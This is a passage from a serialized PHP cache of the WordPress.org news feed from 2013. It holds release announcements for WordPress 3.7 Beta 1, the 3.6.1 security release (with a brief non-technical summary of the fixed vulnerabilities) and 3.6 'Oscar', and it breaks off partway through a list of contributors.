1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://wordpress.org/news/2013/09/wordpress-3-7-beta-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"http://wordpress.org/news/2013/09/wordpress-3-7-beta-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 28 Sep 2013 07:25:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2688\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:339:\"I&#8217;m pleased to announce the availability of WordPress 3.7 Beta 1. For WordPress 3.7 we decided to shorten the development cycle and focus on a few key improvements. We plan to release the final product in October, and then follow it in December with a jam-packed WordPress 3.8 release, which is already in development. Some [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3684:\"<p>I&#8217;m pleased to announce the availability of WordPress 3.7 Beta 1.</p>\n<p>For WordPress 3.7 we decided to shorten the development cycle and focus on a few key improvements. We plan to release the final product in October, and then follow it in December with a jam-packed WordPress 3.8 release, which is already in development. Some of the best stuff in WordPress 3.7 is subtle &#8212; by design! So let&#8217;s walk through what we&#8217;d love for you to test, just in time for the weekend.</p>\n<p><strong>Automatic, background updates.</strong> 3.7 Beta 1 will keep itself updated. That&#8217;s right &#8212; you&#8217;ll be updated each night to the newest development build, and eventually to Beta 2. We&#8217;re working to provide as many installs as possible with fast updates to security releases of WordPress &#8212; and you can help us test by just installing Beta 1 on your server and seeing how it works!</p>\n<p>When you go to <strong>Dashboard → Updates</strong>, you&#8217;ll see a note letting you know whether your install is working for automatic updates. There are a few situations where WordPress can&#8217;t reliably and securely update itself. But if it can, you&#8217;ll get an email (sent to the &#8216;Admin Email&#8217; on the General Settings page) after each update letting you know what worked and what didn&#8217;t. If it worked, great! If something failed, the email will suggest you make a post in the support forums or create a bug report.</p>\n<p>Here are some other things you should test out:</p>\n<ul>\n<li>If you&#8217;re running <strong>WordPress in another language</strong>, we&#8217;ll automatically download any available translations for official WordPress importers and the default themes. (More to come here.)</li>\n<li>Our <strong>password meter</strong> got a whole lot better, thanks to Dropbox&#8217;s <a href=\"https://tech.dropbox.com/2012/04/zxcvbn-realistic-password-strength-estimation/\">zxcvbn</a> library. Again, subtle but effective. Strong passwords are very important!</li>\n<li><strong>Search results</strong> are now <a href=\"http://core.trac.wordpress.org/changeset/25632\">ordered by relevance</a>, rather than just by date. When your keywords match post titles and not just content, they&#8217;ll be pushed to the top.</li>\n<li>Developers should check out the new <strong>advanced date queries</strong> in <code>WP_Query</code>. (<a href=\"http://core.trac.wordpress.org/ticket/18694\">#18694</a>)</li>\n</ul>\n<p><strong>This software is still in development</strong>, so we don&#8217;t recommend you run it on a production site. I&#8217;d suggest setting up a test site just to play with the new version. To test WordPress 3.7, try the <a href=\"http://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you&#8217;ll want &#8220;bleeding edge nightlies&#8221;). Or you can <a href=\"http://wordpress.org/wordpress-3.7-beta1.zip\">download the beta here</a> (zip).</p>\n<p>As always, <strong>if you think you’ve found a bug</strong>, you can post to the <a href=\"http://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. Or, if you’re comfortable writing a reproducible bug report, <a href=\"http://core.trac.wordpress.org/\">file one on the WordPress Trac</a>. There, you can also find <a href=\"http://core.trac.wordpress.org/report/5\">a list of known bugs</a> and <a href=\"http://core.trac.wordpress.org/query?status=closed&amp;group=component&amp;milestone=3.7\">everything we’ve fixed</a> so far.</p>\n<p>Happy testing!</p>\n<p><em>WordPress three seven<br />\nSaves your weary hand a click<br />\nUpdates while you sleep</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wordpress.org/news/2013/09/wordpress-3-7-beta-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"WordPress 3.6.1 Maintenance and Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"http://wordpress.org/news/2013/09/wordpress-3-6-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://wordpress.org/news/2013/09/wordpress-3-6-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Sep 2013 20:48:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2675\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:353:\"After nearly 7 million downloads of WordPress 3.6, we are pleased to announce the availability of version 3.6.1. This maintenance release fixes 13 bugs in version 3.6, which was a very smooth release. WordPress 3.6.1 is also a security release for all previous WordPress versions and we strongly encourage you to update your sites immediately. [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2033:\"<p>After <a href=\"http://wordpress.org/download/counter/\">nearly 7 million downloads</a> of WordPress 3.6, we are pleased to announce the availability of version 3.6.1. This maintenance release <a href=\"http://core.trac.wordpress.org/query?status=closed&amp;group=resolution&amp;milestone=3.6.1\">fixes 13 bugs</a> in version 3.6, which was a very smooth release.</p>\n<p><strong>WordPress 3.6.1 is also a security release for all previous WordPress versions</strong> and we strongly encourage you to update your sites immediately. It addresses three issues fixed by the WordPress security team:</p>\n<ul>\n<li>Block unsafe PHP unserialization that could occur in limited situations and setups, which can lead to remote code execution. Reported by <a href=\"http://vagosec.org/\" rel=\"nofollow\">Tom Van Goethem</a>.</li>\n<li>Prevent a user with an Author role, using a specially crafted request, from being able to create a post &#8220;written by&#8221; another user. Reported by <a href=\"http://anakornk.wordpress.com/\" rel=\"nofollow\">Anakorn Kyavatanakij</a>.</li>\n<li>Fix insufficient input validation that could result in redirecting or leading a user to another website. Reported by Dave Cummo, a Northrup Grumman subcontractor for the <a href=\"http://www.cdc.gov/\" rel=\"nofollow\">U.S. Centers for Disease Control and Prevention</a>.</li>\n</ul>\n<p>Additionally, we&#8217;ve adjusted security restrictions around file uploads to mitigate the potential for cross-site scripting.</p>\n<p>We appreciated <a href=\"http://codex.wordpress.org/FAQ_Security\">responsible disclosure</a> of these issues directly to our security team. For more information on the changes, see the <a href=\"http://codex.wordpress.org/Version_3.6.1\">release notes</a> or consult <a href=\"http://core.trac.wordpress.org/log/branches/3.6?stop_rev=24972&amp;rev=25345\">the list of changes</a>.</p>\n<p><a href=\"http://wordpress.org/wordpress-3.6.1.zip\">Download WordPress 3.6.1</a> or update now from the Dashboard → Updates menu in your site&#8217;s admin area.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://wordpress.org/news/2013/09/wordpress-3-6-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:42:\"\n		\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 3.6 “Oscar”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://wordpress.org/news/2013/08/oscar/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://wordpress.org/news/2013/08/oscar/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Aug 2013 21:43:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2661\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:368:\"The latest and greatest WordPress, version 3.6, is now live to the world and includes a beautiful new blog-centric theme, bullet-proof autosave and post locking, a revamped revision browser, native support for audio and video embeds, and improved integrations with Spotify, Rdio, and SoundCloud. Here&#8217;s a video that shows off some of the features using [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:18626:\"<p>The latest and greatest WordPress, version 3.6, is now <a href=\"http://wordpress.org/download/\">live to the world</a> and includes a beautiful new blog-centric theme, bullet-proof autosave and post locking, a revamped revision browser, native support for audio and video embeds, and improved integrations with Spotify, Rdio, and SoundCloud. Here&#8217;s a video that shows off some of the features using our cast of professional actors:</p>\n<div id=\"v-UmhwbWJH-1\" class=\"video-player\"><embed id=\"v-UmhwbWJH-1-video\" src=\"http://s0.videopress.com/player.swf?v=1.03&amp;guid=UmhwbWJH&amp;isDynamicSeeking=true\" type=\"application/x-shockwave-flash\" width=\"692\" height=\"388\" title=\"Introducing WordPress 3.6 &quot;Oscar&quot;\" wmode=\"direct\" seamlesstabbing=\"true\" allowfullscreen=\"true\" allowscriptaccess=\"always\" overstretch=\"true\"></embed></div>\n<p>We&#8217;re calling this release &#8220;Oscar&#8221; in honor of the great jazz pianist <a href=\"http://en.wikipedia.org/wiki/Oscar_Peterson\">Oscar Peterson</a>. Here&#8217;s a bit more about some of the new features, which you can also find on the about page in your dashboard after you upgrade.</p>\n<h3>User Features</h3>\n<p><img class=\"alignright\" alt=\"\" src=\"https://wordpress.org/images/core/3.6/twentythirteen.png\" width=\"300\" /></p>\n<ul>\n<li>The <strong>new Twenty Thirteen theme</strong> inspired by modern art puts focus on your content with a colorful, single-column design made for media-rich blogging.</li>\n<li><strong>Revamped Revisions</strong> save every change and the new interface allows you to scroll easily through changes to see line-by-line who changed what and when.</li>\n<li><strong>Post Locking</strong> and <strong>Augmented Autosave</strong> will especially be a boon to sites where more than a single author is working on a post. Each author now has their own autosave stream, which stores things locally as well as on the server (so much harder to lose something) and there&#8217;s an interface for taking over editing of a post, as demonstrated beautifully by our bearded buddies in the video above.</li>\n<li><strong>Built-in HTML5 media player</strong> for native audio and video embeds with no reliance on external services.</li>\n<li>The <strong>Menu Editor</strong> is now much easier to understand and use.</li>\n</ul>\n<h3>Developer features</h3>\n<ul>\n<li>A new audio/video API gives you access to metadata like ID3 tags.</li>\n<li>You can now choose HTML5 markup for things like comment and search forms, and comment lists.</li>\n<li>Better filters for how revisions work, so you can store a different amount of history for different post types.</li>\n<li>Tons more <a href=\"http://codex.wordpress.org/Version_3.6\">listed on the Codex</a>, and of course you can always <a href=\"http://core.trac.wordpress.org/query?status=closed&amp;group=resolution&amp;milestone=3.6\">browse the over 700 closed tickets</a>.</li>\n</ul>\n<h3>The Band</h3>\n<p>This release was led by <a href=\"http://markjaquith.com/\">Mark Jaquith</a> and <a href=\"http://geekreprieve.com/\">Aaron Campbell</a>, and included contributions from the following fine folks. Pull up some Oscar Peterson on your music service of choice, or vinyl if you have it, and check out some of their profiles:</p>\n<p><a href=\"http://profiles.wordpress.org/technosailor\">Aaron Brazell</a>, <a href=\"http://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"http://profiles.wordpress.org/aaronholbrook\">Aaron Holbrook</a>, <a href=\"http://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"http://profiles.wordpress.org/kawauso\">Adam Harley</a>, <a href=\"http://profiles.wordpress.org/adamsilverstein\">adamsilverstein</a>, <a href=\"http://profiles.wordpress.org/akted\">AK Ted</a>, <a href=\"http://profiles.wordpress.org/xknown\">Alex Concha</a>, <a href=\"http://profiles.wordpress.org/alexkingorg\">Alex King</a>, <a href=\"http://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"http://profiles.wordpress.org/momo360modena\">Amaury Balmer</a>, <a href=\"http://profiles.wordpress.org/sabreuse\">Amy Hendrix (sabreuse)</a>, <a href=\"http://profiles.wordpress.org/anatolbroder\">Anatol Broder</a>, <a href=\"http://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"http://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"http://profiles.wordpress.org/andrewryno\">Andrew Ryno</a>, <a href=\"http://profiles.wordpress.org/andy\">Andy Skelton</a>, <a href=\"http://profiles.wordpress.org/gorgoglionemeister\">Antonio</a>, <a href=\"http://profiles.wordpress.org/apimlott\">apimlott</a>, <a href=\"http://profiles.wordpress.org/awellis13\">awellis13</a>, <a href=\"http://profiles.wordpress.org/barry\">Barry</a>, <a href=\"http://profiles.wordpress.org/beaulebens\">Beau Lebens</a>, <a href=\"http://profiles.wordpress.org/belloswan\">BelloSwan</a>, <a href=\"http://profiles.wordpress.org/bilalcoder\">bilalcoder</a>, <a href=\"http://profiles.wordpress.org/bananastalktome\">Billy (bananastalktome)</a>, <a href=\"http://profiles.wordpress.org/bobbingwide\">bobbingwide</a>, <a href=\"http://profiles.wordpress.org/bobbravo2\">Bob Gregor</a>, <a href=\"http://profiles.wordpress.org/bradparbs\">bradparbs</a>, <a href=\"http://profiles.wordpress.org/bradyvercher\">Brady Vercher</a>, <a href=\"http://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"http://profiles.wordpress.org/brianlayman\">Brian Layman</a>, <a href=\"http://profiles.wordpress.org/beezeee\">Brian Zeligson</a>, <a href=\"http://profiles.wordpress.org/bpetty\">Bryan Petty</a>, <a href=\"http://profiles.wordpress.org/chmac\">Callum Macdonald</a>, <a href=\"http://profiles.wordpress.org/carldanley\">Carl Danley</a>, <a href=\"http://profiles.wordpress.org/caspie\">Caspie</a>, <a href=\"http://profiles.wordpress.org/charlestonsw\">Charleston Software Associates</a>, <a href=\"http://profiles.wordpress.org/cheeserolls\">cheeserolls</a>, <a href=\"http://profiles.wordpress.org/chipbennett\">Chip Bennett</a>, <a href=\"http://profiles.wordpress.org/c3mdigital\">Chris Olbekson</a>, <a href=\"http://profiles.wordpress.org/cochran\">Christopher Cochran</a>, <a href=\"http://profiles.wordpress.org/cfinke\">Christopher Finke</a>, <a href=\"http://profiles.wordpress.org/chriswallace\">Chris Wallace</a>, <a href=\"http://profiles.wordpress.org/corvannoorloos\">Cor van Noorloos</a>, <a href=\"http://profiles.wordpress.org/crazycoders\">crazycoders</a>, <a href=\"http://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"http://profiles.wordpress.org/mzaweb\">Daniel Dvorkin (MZAWeb)</a>, <a href=\"http://profiles.wordpress.org/redsweater\">Daniel Jalkut (Red Sweater)</a>, <a href=\"http://profiles.wordpress.org/daniloercoli\">daniloercoli</a>, <a href=\"http://profiles.wordpress.org/dannydehaan\">Danny de Haan</a>, <a href=\"http://profiles.wordpress.org/csixty4\">Dave Ross</a>, <a href=\"http://profiles.wordpress.org/dfavor\">David Favor</a>, <a href=\"http://profiles.wordpress.org/jdtrower\">David Trower</a>, <a href=\"http://profiles.wordpress.org/davidwilliamson\">David Williamson</a>, <a href=\"http://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"http://profiles.wordpress.org/dllh\">dllh</a>, <a href=\"http://profiles.wordpress.org/ocean90\">Dominik Schilling (ocean90)</a>, <a href=\"http://profiles.wordpress.org/dovyp\">dovyp</a>, <a href=\"http://profiles.wordpress.org/drewapicture\">Drew Jaynes (DrewAPicture)</a>, <a href=\"http://profiles.wordpress.org/dvarga\">dvarga</a>, <a href=\"http://profiles.wordpress.org/cais\">Edward Caissie</a>, <a href=\"http://profiles.wordpress.org/elfin\">elfin</a>, <a href=\"http://profiles.wordpress.org/empireoflight\">Empireoflight</a>, <a href=\"http://profiles.wordpress.org/ericlewis\">Eric Andrew Lewis</a>, <a href=\"http://profiles.wordpress.org/ethitter\">Erick Hitter</a>, <a href=\"http://profiles.wordpress.org/ericmann\">Eric Mann</a>, <a href=\"http://profiles.wordpress.org/evansolomon\">Evan Solomon</a>, <a href=\"http://profiles.wordpress.org/faishal\">faishal</a>, <a href=\"http://profiles.wordpress.org/feedmeastraycat\">feedmeastraycat</a>, <a href=\"http://profiles.wordpress.org/frank-klein\">Frank Klein</a>, <a href=\"http://profiles.wordpress.org/f-j-kaiser\">Franz Josef Kaiser</a>, <a href=\"http://profiles.wordpress.org/fstop\">FStop</a>, <a href=\"http://profiles.wordpress.org/mintindeed\">Gabriel Koen</a>, <a href=\"http://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"http://profiles.wordpress.org/garyj\">Gary Jones</a>, <a href=\"http://profiles.wordpress.org/gcorne\">gcorne</a>, <a href=\"http://profiles.wordpress.org/geertdd\">GeertDD</a>, <a href=\"http://profiles.wordpress.org/soulseekah\">Gennady Kovshenin</a>, <a href=\"http://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"http://profiles.wordpress.org/gish\">gish</a>, <a href=\"http://profiles.wordpress.org/tivnet\">Gregory Karpinsky</a>, <a href=\"http://profiles.wordpress.org/hakre\">hakre</a>, <a href=\"http://profiles.wordpress.org/hbanken\">hbanken</a>, <a href=\"http://profiles.wordpress.org/hebbet\">hebbet</a>, <a href=\"http://profiles.wordpress.org/helen\">Helen Hou-Sandi</a>, <a href=\"http://profiles.wordpress.org/helgatheviking\">helgatheviking</a>, <a href=\"http://profiles.wordpress.org/hirozed\">hirozed</a>, <a href=\"http://profiles.wordpress.org/hurtige\">hurtige</a>, <a href=\"http://profiles.wordpress.org/hypertextranch\">hypertextranch</a>, <a href=\"http://profiles.wordpress.org/iandunn\">Ian Dunn</a>, <a href=\"http://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"http://profiles.wordpress.org/jakub\">jakub</a>, <a href=\"http://profiles.wordpress.org/h4ck3rm1k3\">James Michael DuPont</a>, <a href=\"http://profiles.wordpress.org/jbutkus\">jbutkus</a>, <a href=\"http://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"http://profiles.wordpress.org/jerrysarcastic\">Jerry Bates (JerrySarcastic)</a>, <a href=\"http://profiles.wordpress.org/jayjdk\">Jesper Johansen (Jayjdk)</a>, <a href=\"http://profiles.wordpress.org/joehoyle\">Joe Hoyle</a>, <a href=\"http://profiles.wordpress.org/joen\">Joen Asmussen</a>, <a href=\"http://profiles.wordpress.org/jkudish\">Joey Kudish</a>, <a href=\"http://profiles.wordpress.org/johnbillion\">John Blackbourn (johnbillion)</a>, <a href=\"http://profiles.wordpress.org/johnjamesjacoby\">John James Jacoby</a>, <a href=\"http://profiles.wordpress.org/jond3r\">Jonas Bolinder (jond3r)</a>, <a href=\"http://profiles.wordpress.org/desrosj\">Jonathan Desrosiers</a>, <a href=\"http://profiles.wordpress.org/jonbishop\">Jon Bishop</a>, <a href=\"http://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"http://profiles.wordpress.org/jcastaneda\">Jose Castaneda</a>, <a href=\"http://profiles.wordpress.org/josephscott\">Joseph Scott</a>, <a href=\"http://profiles.wordpress.org/jvisick77\">Josh Visick</a>, <a href=\"http://profiles.wordpress.org/jrbeilke\">jrbeilke</a>, <a href=\"http://profiles.wordpress.org/jrf\">jrf</a>, <a href=\"http://profiles.wordpress.org/devesine\">Justin de Vesine</a>, <a href=\"http://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"http://profiles.wordpress.org/kadamwhite\">kadamwhite</a>, <a href=\"http://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"http://profiles.wordpress.org/karmatosed\">karmatosed</a>, <a href=\"http://profiles.wordpress.org/ryelle\">Kelly Dwan</a>, <a href=\"http://profiles.wordpress.org/keoshi\">keoshi</a>, <a href=\"http://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"http://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"http://profiles.wordpress.org/ktdreyer\">ktdreyer</a>, <a href=\"http://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"http://profiles.wordpress.org/kwight\">kwight</a>, <a href=\"http://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"http://profiles.wordpress.org/leewillis77\">Lee Willis (leewillis77)</a>, <a href=\"http://profiles.wordpress.org/lessbloat\">lessbloat</a>, <a href=\"http://profiles.wordpress.org/settle\">Mantas Malcius</a>, <a href=\"http://profiles.wordpress.org/maor\">Maor Chasen</a>, <a href=\"http://profiles.wordpress.org/macbrink\">Marcel Brinkkemper</a>, <a href=\"http://profiles.wordpress.org/marcuspope\">MarcusPope</a>, <a href=\"http://profiles.wordpress.org/mark-k\">Mark-k</a>, <a href=\"http://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"http://profiles.wordpress.org/markmcwilliams\">Mark McWilliams</a>, <a href=\"http://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"http://profiles.wordpress.org/mjbanks\">Matt Banks</a>, <a href=\"http://profiles.wordpress.org/mboynes\">Matthew Boynes</a>, <a href=\"http://profiles.wordpress.org/matthewruddy\">MatthewRuddy</a>, <a href=\"http://profiles.wordpress.org/mattwiebe\">Matt Wiebe</a>, <a href=\"http://profiles.wordpress.org/maxcutler\">Max Cutler</a>, <a href=\"http://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"http://profiles.wordpress.org/mgibbs189\">mgibbs189</a>, <a href=\"http://profiles.wordpress.org/fanquake\">Michael</a>, <a href=\"http://profiles.wordpress.org/mdawaffe\">Michael Adams (mdawaffe)</a>, <a href=\"http://profiles.wordpress.org/tw2113\">Michael Beckwith</a>, <a href=\"http://profiles.wordpress.org/mfields\">Michael Fields</a>, <a href=\"http://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"http://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"http://profiles.wordpress.org/dimadin\">Milan Dinic</a>, <a href=\"http://profiles.wordpress.org/mitchoyoshitaka\">mitcho (Michael Yoshitaka Erlewine)</a>, <a href=\"http://profiles.wordpress.org/batmoo\">Mohammad Jangda</a>, <a href=\"http://profiles.wordpress.org/najamelan\">najamelan</a>, <a href=\"http://profiles.wordpress.org/Nao\">Naoko Takano</a>, <a href=\"http://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"http://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"http://profiles.wordpress.org/nickdaugherty\">Nick Daugherty</a>, <a href=\"http://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"http://profiles.wordpress.org/ninnypants\">ninnypants</a>, <a href=\"http://profiles.wordpress.org/norcross\">norcross</a>, <a href=\"http://profiles.wordpress.org/paradiseporridge\">ParadisePorridge</a>, <a href=\"http://profiles.wordpress.org/pauldewouters\">Paul</a>, <a 